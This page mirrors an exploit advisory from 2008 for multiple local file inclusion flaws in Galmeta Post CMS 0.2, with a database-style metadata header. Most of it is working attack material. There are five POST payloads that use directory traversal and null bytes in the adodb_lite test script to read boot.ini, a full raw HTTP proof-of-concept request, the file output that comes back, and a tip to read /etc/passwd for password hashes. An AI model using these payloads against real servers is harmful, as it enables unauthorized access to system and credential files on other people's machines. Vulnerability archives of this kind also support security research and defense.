header-logo
Suggest Exploit
vendor:
Galmeta Post CMS
by:
CWH Underground
7.5
CVSS
HIGH
Multiple Local File Inclusion
98
CWE
Product Name: Galmeta Post CMS
Affected Version From: 0.2
Affected Version To: 0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:galmeta_post_cms:galmeta_post_cms:0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Galmeta Post CMS Multiple Local File Inclusion Vulnerabilities

Galmeta Post CMS is vulnerable to multiple local file inclusion vulnerabilities when using the POST method. An attacker can exploit these vulnerabilities by sending maliciously crafted POST requests to the vulnerable application. This can allow an attacker to include arbitrary files from the local system, such as the boot.ini file.

Mitigation:

No patch available.
Source

Exploit-DB raw data:

==================================================================
  Galmeta Post CMS Multiple Local File Inclusion Vulnerabilities
==================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 26 June 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Galmeta Post CMS
 VERSION     : 0.2
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/galmetapost
#####################################################

--- Multiple Local File Inclusion [POST Method] ---


----------
 Exploits
----------

[+] http://[Target]/[post_blog_path]/_lib/adodb_lite/tests/test_adodb_lite.php

    [-] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
    [-] databasetype=mysql&transactions=../../../../../../../boot.ini%00&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
    [-] databasetype=mysql&transactions=transaction%3A&adodblite=../../../../../../../boot.ini%00&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
    [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=../../../../../../../boot.ini%00&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
    [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=extend%3A&date=../../../../../../../../boot.ini%00&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit

    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash.

-------------
 POC Exploit
-------------

[+] POST Method
[+] 
[+] POST http://192.168.24.25/post_blog/_lib/adodb_lite/tests/test_adodb_lite.php HTTP/1.0
[+] Accept: */*
[+] Content-Type: application/x-www-form-urlencoded
[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[+] Host: 192.168.24.25
[+] Content-Length: 309
[+] Cookie: PHPSESSID=842f465924119eaa2b0fd3664fcc3b14
[+] Connection: Close
[+] 
[+] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-26]

Navigation

Suggest Exploit

Services By CQR